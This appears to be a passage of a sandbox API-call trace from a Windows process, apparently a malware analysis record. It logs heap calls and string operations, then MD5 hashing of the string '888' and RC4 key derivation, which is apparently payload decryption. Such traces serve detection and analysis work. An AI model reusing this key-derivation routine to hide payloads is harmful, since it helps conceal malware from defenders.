RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.585] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.585] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.585] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0208.586] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0208.586] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0208.586] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c98 [0208.586] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0208.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.586] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0208.587] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0208.587] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c98 | out: hHeap=0x2af0000) returned 1 [0208.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0208.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0208.588] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0208.588] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.588] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0208.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74508 [0208.588] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.589] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.589] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.589] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.589] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.589] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.589] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.589] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.589] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.590] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.590] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.590] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.590] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.590] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.590] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.590] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab3f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0208.590] CryptCreateHash (in: hProv=0xa7bef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0208.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.591] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.591] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.591] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0208.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab2f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0208.591] CryptHashData (hHash=0x9e2078, pbData=0x2a71b18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.591] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.591] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.591] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.591] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.592] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.592] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.592] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab3b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.592] CryptDeriveKey (in: hProv=0xa7bef0, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0208.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.592] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.592] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.592] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.592] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.592] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 